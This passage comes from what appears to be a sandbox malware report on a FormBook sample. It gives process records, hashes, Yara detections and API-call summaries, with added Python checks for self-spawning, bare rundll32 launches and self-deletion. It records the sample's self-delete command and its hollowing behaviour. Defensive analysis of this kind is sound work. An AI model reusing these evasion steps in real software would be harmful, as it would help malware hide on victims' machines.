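                        "statuses": sorted({m["status"] for m in members}),
                        "sessions": sorted(m["id"] for m in members)})
    return out


if __name__ == "__main__":
    for c in suspicious_clusters(SESSIONS):
        print(c["key"], sorted(c["hosts"]), c["destinations"], c["statuses"])
```

The key deliberately ignores the second parameter, which changes on every request, and the response code, which the decoy hosts control; in the report the single cluster covers sessions 6, 7 and 8 with one destination address and nothing but 403 replies.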


                                                                               Code Manipulations

                                                                               Statistics

                                                                               CPU Usage (per-process chart)

                                                                               Memory Usage (per-process chart)

                                                                               High Level Behavior Distribution (per-process chart)

                                                                               Behavior (per-process chart)

                                                                              System Behavior

                                                                              General

                                                                               Start time: 14:41:27
                                                                               Start date: 12/04/2021
                                                                               Path: C:\Users\user\Desktop\Design Template.exe
                                                                               Wow64 process (32bit): true
                                                                               Commandline: 'C:\Users\user\Desktop\Design Template.exe'
                                                                               Imagebase: 0x400000
                                                                               File size: 479232 bytes
                                                                               MD5 hash: 56D56566623A2BC942141B56F9DD3DA5
                                                                               Has elevated privileges: true
                                                                               Has administrator privileges: true
                                                                               Programmed in: C, C++ or other language
                                                                               Yara matches:
                                                                               • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.280097303.0000000000613000.00000004.00000020.sdmp, Author: Joe Security
                                                                               • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.280097303.0000000000613000.00000004.00000020.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                               • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.280097303.0000000000613000.00000004.00000020.sdmp, Author: JPCERT/CC Incident Response Group
                                                                               Reputation: low

                                                                              General

                                                                               Start time: 14:41:46
                                                                               Start date: 12/04/2021
                                                                               Path: C:\Users\user\Desktop\Design Template.exe
                                                                               Wow64 process (32bit): true
                                                                               Commandline: C:\Users\user\Desktop\Design Template.exe
                                                                               Imagebase: 0x400000
                                                                               File size: 479232 bytes
                                                                               MD5 hash: 56D56566623A2BC942141B56F9DD3DA5
                                                                               Has elevated privileges: true
                                                                               Has administrator privileges: true
                                                                               Programmed in: C, C++ or other language
                                                                               Yara matches:
                                                                               • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.329067264.00000000009A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                               • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.329067264.00000000009A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                               • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.329067264.00000000009A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                               • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.329542692.0000000000D10000.00000040.00000001.sdmp, Author: Joe Security
                                                                               • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.329542692.0000000000D10000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                               • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.329542692.0000000000D10000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                               Reputation: low

                                                                              General

                                                                               Start time: 14:41:49
                                                                               Start date: 12/04/2021
                                                                               Path: C:\Windows\explorer.exe
                                                                               Wow64 process (32bit): false
                                                                               Commandline:
                                                                               Imagebase: 0x7ff662bf0000
                                                                               File size: 3933184 bytes
                                                                               MD5 hash: AD5296B280E8F522A8A897C96BAB0E1D
                                                                               Has elevated privileges: true
                                                                               Has administrator privileges: true
                                                                               Programmed in: C, C++ or other language
                                                                               Reputation: high

                                                                              General

                                                                               Start time: 14:42:06
                                                                               Start date: 12/04/2021
                                                                               Path: C:\Windows\SysWOW64\rundll32.exe
                                                                               Wow64 process (32bit): true
                                                                               Commandline: C:\Windows\SysWOW64\rundll32.exe
                                                                               Imagebase: 0x1030000
                                                                               File size: 61952 bytes
                                                                               MD5 hash: D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                               Has elevated privileges: true
                                                                               Has administrator privileges: true
                                                                               Programmed in: C, C++ or other language
                                                                               Yara matches:
                                                                               • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.502155001.0000000000720000.00000040.00000001.sdmp, Author: Joe Security
                                                                               • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.502155001.0000000000720000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                               • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.502155001.0000000000720000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                               • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.502311123.0000000000750000.00000004.00000001.sdmp, Author: Joe Security
                                                                               • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.502311123.0000000000750000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                               • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.502311123.0000000000750000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                               • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.501445040.00000000004F0000.00000040.00000001.sdmp, Author: Joe Security
                                                                               • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.501445040.00000000004F0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                               • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.501445040.00000000004F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                               Reputation: high

                                                                              General

                                                                               Start time: 14:42:11
                                                                               Start date: 12/04/2021
                                                                               Path: C:\Windows\SysWOW64\cmd.exe
                                                                               Wow64 process (32bit): true
                                                                               Commandline: /c del 'C:\Users\user\Desktop\Design Template.exe'
                                                                               Imagebase: 0x970000
                                                                               File size: 232960 bytes
                                                                               MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
                                                                               Has elevated privileges: true
                                                                               Has administrator privileges: true
                                                                               Programmed in: C, C++ or other language
                                                                               Reputation: high

                                                                              General

                                                                               Start time: 14:42:12
                                                                               Start date: 12/04/2021
                                                                               Path: C:\Windows\System32\conhost.exe
                                                                               Wow64 process (32bit): false
                                                                               Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                               Imagebase: 0x7ff774ee0000
                                                                               File size: 625664 bytes
                                                                               MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                               Has elevated privileges: true
                                                                               Has administrator privileges: true
                                                                               Programmed in: C, C++ or other language
                                                                               Reputation: high
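
Three things in the process blocks above are worth turning into checks over endpoint process-creation telemetry: the sample starts a second copy of itself with the same image path (the shape left by the suspended-child-then-hollow pattern the report's signatures describe), rundll32.exe is launched with no DLL or entry point, and cmd.exe deletes the original sample. The Python below is an added example, not code from the report or the sample, and runs those three checks over Sysmon-style events constructed from the table. The process numbers 2, 4 and 14 (0xE) are the ones the report's Yara source identifiers use; the remaining pids and every parent pid are assumptions, as is the event field layout.

```python
"""Process-start checks for the behaviour listed in this report's System
Behavior table. Added example over constructed Sysmon-style events."""
import re

SAMPLE = r"C:\Users\user\Desktop\Design Template.exe"

# Constructed from the report's "General" blocks. pids 2, 4 and 14 follow the
# Yara source identifiers; pids 5, 15, 16 and all ppid values are assumed.
EVENTS = [
    {"pid": 2,  "ppid": 1,  "image": SAMPLE, "cmdline": "'" + SAMPLE + "'"},
    {"pid": 4,  "ppid": 2,  "image": SAMPLE, "cmdline": SAMPLE},
    {"pid": 5,  "ppid": 1,  "image": r"C:\Windows\explorer.exe", "cmdline": ""},
    {"pid": 14, "ppid": 5,  "image": r"C:\Windows\SysWOW64\rundll32.exe",
     "cmdline": r"C:\Windows\SysWOW64\rundll32.exe"},
    {"pid": 15, "ppid": 14, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": "/c del '" + SAMPLE + "'"},
    {"pid": 16, "ppid": 15, "image": r"C:\Windows\System32\conhost.exe",
     "cmdline": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
]


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def args_after_image(image, cmdline):
    """Return whatever follows the executable in cmdline. Handles a quoted
    image path, an unquoted path containing spaces (matched against the
    known image) and a cmdline that already holds only the arguments."""
    c = cmdline.strip()
    if c[:1] in ("'", '"') and c.find(c[0], 1) != -1:
        return c[c.find(c[0], 1) + 1:].strip()
    if c.lower().startswith(image.lower()):
        return c[len(image):].strip()
    return c


def find_self_spawn(events):
    """(parent pid, child pid) pairs where both share one image path."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        parent = by_pid.get(e["ppid"])
        if parent and parent["image"].lower() == e["image"].lower():
            hits.append((parent["pid"], e["pid"]))
    return hits


def find_bare_rundll32(events):
    """rundll32.exe with no DLL,entrypoint argument: it has nothing to run on
    its own, so a bare launch is a host-process choice, not a genuine use."""
    return [e for e in events
            if basename(e["image"]) == "rundll32.exe"
            and args_after_image(e["image"], e["cmdline"]) == ""]


# 'del' followed by an optionally quoted path that runs to the end of the line.
_DEL_RE = re.compile(r"\bdel\s+['\"]?(.+?)['\"]?\s*$", re.IGNORECASE)


def find_self_delete(events):
    """(pid, path) for cmd.exe deleting the image of a process in the same set."""
    images = {e["image"].lower() for e in events}
    hits = []
    for e in events:
        if basename(e["image"]) != "cmd.exe":
            continue
        m = _DEL_RE.search(e["cmdline"])
        if m and m.group(1).lower() in images:
            hits.append((e["pid"], m.group(1)))
    return hits


if __name__ == "__main__":
    print("self-spawn:", find_self_spawn(EVENTS))
    print("bare rundll32:", [e["pid"] for e in find_bare_rundll32(EVENTS)])
    print("self-delete:", find_self_delete(EVENTS))
```

None of the three checks is conclusive alone (installers re-exec themselves, and some setup routines delete their own payload), but all three firing within the same short process chain, with a system binary doing the network traffic in between, is the picture this report draws.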

                                                                              Disassembly

                                                                              Code Analysis


                                                                                Executed Functions

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp
                                                                                 • Associated: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp
                                                                                 • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp
                                                                                 • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp
                                                                                 • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp
                                                                                 • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp
                                                                                 • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp
                                                                                 • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 58fe25780cbd1d5dd60044fa9f6225bcfda5603850e4de2d90baa676da930ecf
                                                                                • Instruction ID: 0e4acfaf2bc0e0c5250e6a290611991c2eff94b59f19ce5085c9185608f88020
                                                                                • Opcode Fuzzy Hash: 58fe25780cbd1d5dd60044fa9f6225bcfda5603850e4de2d90baa676da930ecf
                                                                                • Instruction Fuzzy Hash: A1B21BB1D00218EFEF14DF94CC45BEEB7B5AF88304F10959AE509AB280D778AA85CF55
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp
                                                                                 • Associated: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp
                                                                                 • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp
                                                                                 • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp
                                                                                 • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp
                                                                                 • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp
                                                                                 • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp
                                                                                 • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: @$bHC$bHC
                                                                                • API String ID: 0-379616849
                                                                                • Opcode ID: cdb2f8260c3cfb50a0a7dfa647fcfbaac2fccda0868779c582bc9bfff14ce8ab
                                                                                • Instruction ID: 228f60f9be162a54ec86171d398c6a8fb46f68f7711e85f4697109cc14e47f7a
                                                                                • Opcode Fuzzy Hash: cdb2f8260c3cfb50a0a7dfa647fcfbaac2fccda0868779c582bc9bfff14ce8ab
                                                                                • Instruction Fuzzy Hash: D04130B4A50209BFDB14CF94CC86FDEB7B4AF48740F108558F555AB2C0D7B4AA44CB99
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp
                                                                                 • Associated: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp
                                                                                 • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp
                                                                                 • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp
                                                                                 • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp
                                                                                 • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp
                                                                                 • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp
                                                                                 • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: CoCreateInstance$CoInitializeEx$SHCreateItemFromParsingName$SHGetSpecialFolderPathW$lizeEx
                                                                                • API String ID: 0-1941468094
                                                                                • Opcode ID: b3bfe5c6a802bc3f6c2faef9970a5cda9d26535018f11c8bca9472528f1fe093
                                                                                • Instruction ID: 1abd636e182a27311c98dd0ae47b0caf91cb69de68426162ff2a61f3b8dcef36
                                                                                • Opcode Fuzzy Hash: b3bfe5c6a802bc3f6c2faef9970a5cda9d26535018f11c8bca9472528f1fe093
                                                                                • Instruction Fuzzy Hash: 30E14470D08388DEEB11CBA4C84479DBFB26F19304F14919DE448AF382D7BA9A59C776
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • NtCreateFile.NTDLL(?,80100000,00000018,?,00000000,00000080,00000007,00000001,00000060,00000000,00000000), ref: 00434709
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: CreateFile
                                                                                • String ID: @
                                                                                • API String ID: 823142352-2766056989
                                                                                • Opcode ID: fcce1b8f83ce6098c17e5add9eb751c495a580ee7a9faf8ac2add711d0234b4c
                                                                                • Instruction ID: 50a2565524186228f49046d7db69fc9055af216314393884cb3c1c256b49a57e
                                                                                • Opcode Fuzzy Hash: fcce1b8f83ce6098c17e5add9eb751c495a580ee7a9faf8ac2add711d0234b4c
                                                                                • Instruction Fuzzy Hash: 98411E75A40208BFEB14CF94CC85FEEB7B5AF48710F208559FA15AB2D0D7B4AA05CB94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: @
                                                                                • API String ID: 0-2766056989
                                                                                • Opcode ID: 3cc6f16a382698ea9cc30287e394aa241eed86385e281fa8b7b9b80aab4f7af6
                                                                                • Instruction ID: 7daf56bdd95a51f40f1bf24ff7f1458a98e4ef1f58082935c3045c2a0acb2187
                                                                                • Opcode Fuzzy Hash: 3cc6f16a382698ea9cc30287e394aa241eed86385e281fa8b7b9b80aab4f7af6
                                                                                • Instruction Fuzzy Hash: D9515F70A50209EBEB10DFA4CC41FEE77B5AF4C700F109529F549EB280E775AA45CB55
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetVersion.KERNEL32(?,?,?,00431B57), ref: 00431BD3
                                                                                • GetProcessVersion.KERNELBASE(00000000,?,?,?,00431B57), ref: 00431C10
                                                                                • LoadCursorA.USER32 ref: 00431C3E
                                                                                • LoadCursorA.USER32 ref: 00431C49
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: CursorLoadVersion$Process
                                                                                • String ID:
                                                                                • API String ID: 2246821583-0
                                                                                • Opcode ID: 9ef0c311a2055819bab3e13b0b634dab8ceb4500b74ab5ab51af9181cf52dd85
                                                                                • Instruction ID: 3914e1cd0e40f892f12fefa2992eef9613f070732c68f7a057d98c3d4a22ec50
                                                                                • Opcode Fuzzy Hash: 9ef0c311a2055819bab3e13b0b634dab8ceb4500b74ab5ab51af9181cf52dd85
                                                                                • Instruction Fuzzy Hash: 7E114CB1A40B608FD7649F3A988452ABBE5FB487057405D3FE18BC6B90D7B8E444CB54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • NtWriteFile.NTDLL(?,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 00435737
                                                                                • NtCreateSection.NTDLL(00000000,000F001F,00000000,00000000,00000002,01000000,?), ref: 0043576F
                                                                                • NtClose.NTDLL(?,?,00000001,?,00000030,00000000,?,00000001), ref: 00435803
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: CloseCreateFileSectionWrite
                                                                                • String ID:
                                                                                • API String ID: 2349782792-0
                                                                                • Opcode ID: 701d89797e0bb8792af7d360e5ea09c4bc7bfdf99c1c12c2fa203f4917575bf1
                                                                                • Instruction ID: 525f56e15e2d80a870e9e9e489733885a9e8928b7a611378e6ba6dc6ec8cdbc7
                                                                                • Opcode Fuzzy Hash: 701d89797e0bb8792af7d360e5ea09c4bc7bfdf99c1c12c2fa203f4917575bf1
                                                                                • Instruction Fuzzy Hash: 6461F674A00609EFDB08DF84C885FAEBBB1BF48314F208159E8159B390D778EA95CF94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • NtClose.NTDLL(00000000), ref: 0043562C
                                                                                • NtFreeVirtualMemory.NTDLL(000000FF,00000000,00000000,00008000), ref: 00435695
                                                                                • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 004356A7
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: CloseFreeMemorySectionUnmapViewVirtual
                                                                                • String ID:
                                                                                • API String ID: 3320349860-0
                                                                                • Opcode ID: 188f8b6f1d376f19d687f11c21be0d03f228e20fd9304d7282a8211628cc8c36
                                                                                • Instruction ID: 604968aa50fe317101ff1d4887b3d7cd1a75c106297ca65db997c9debd794807
                                                                                • Opcode Fuzzy Hash: 188f8b6f1d376f19d687f11c21be0d03f228e20fd9304d7282a8211628cc8c36
                                                                                • Instruction Fuzzy Hash: FA310671900218EBEF24CB94CC4DBEEB375BB49315F64828AA11DA62D0CBB85EC4CF15
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • NtClose.NTDLL(00000000), ref: 0043562C
                                                                                • NtFreeVirtualMemory.NTDLL(000000FF,00000000,00000000,00008000), ref: 00435695
                                                                                • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 004356A7
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: CloseFreeMemorySectionUnmapViewVirtual
                                                                                • String ID:
                                                                                • API String ID: 3320349860-0
                                                                                • Opcode ID: af932d642f6ad79af75f5b463a93244e82566cd67f8d0da9e2d64c393f9b7829
                                                                                • Instruction ID: 51c76f1343f0ec26a5da15dda2908f9517741de44a291e8043d947b8f342a8a4
                                                                                • Opcode Fuzzy Hash: af932d642f6ad79af75f5b463a93244e82566cd67f8d0da9e2d64c393f9b7829
                                                                                • Instruction Fuzzy Hash: 1E216670900618EBEF24CB90CC4DBEEB375BB08311FA0928AE119662C0CBB84EC4CF55
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: @
                                                                                • API String ID: 0-2766056989
                                                                                • Opcode ID: cd402a352ddc17dd51bfb3b8dffc53a547eeeeb8e77fedd15555b077d7eeb747
                                                                                • Instruction ID: 6238b8ccb3f42f940ba4e24c1ae626af61c76d370d47b750129fee9020dd4ff5
                                                                                • Opcode Fuzzy Hash: cd402a352ddc17dd51bfb3b8dffc53a547eeeeb8e77fedd15555b077d7eeb747
                                                                                • Instruction Fuzzy Hash: EC411170A04209EFEF10CF94C848BEEBBB5BF98354F109159F9157B280C7B9AA85CB55
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • NtTerminateProcess.NTDLL(000000FF,00000000), ref: 0043832D
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: ProcessTerminate
                                                                                • String ID:
                                                                                • API String ID: 560597551-0
                                                                                • Opcode ID: 5e74648f8415b3abc1f55e738af89c7949e93b21fbc3e0da6157c83b2565cb6c
                                                                                • Instruction ID: 80513499a7ed397fe39db85238073f76c907f169e60168fa2041f439afa6219b
                                                                                • Opcode Fuzzy Hash: 5e74648f8415b3abc1f55e738af89c7949e93b21fbc3e0da6157c83b2565cb6c
                                                                                • Instruction Fuzzy Hash: AB4150F2C00308AADF10DBE5CC45BEFB7786B1C305F04555FF505A6281EA399648CB6A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00007FFF,00003000,00000004), ref: 004340C1
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: AllocateMemoryVirtual
                                                                                • String ID:
                                                                                • API String ID: 2167126740-0
                                                                                • Opcode ID: 484c9e5f2c93bf47596e3c6f4954b22454ae253e1a64b48f16b01ea7e63a0146
                                                                                • Instruction ID: c6f8b0846bc1e1c635515480c89d8d23f110a427215ea1c9d94e94278b875000
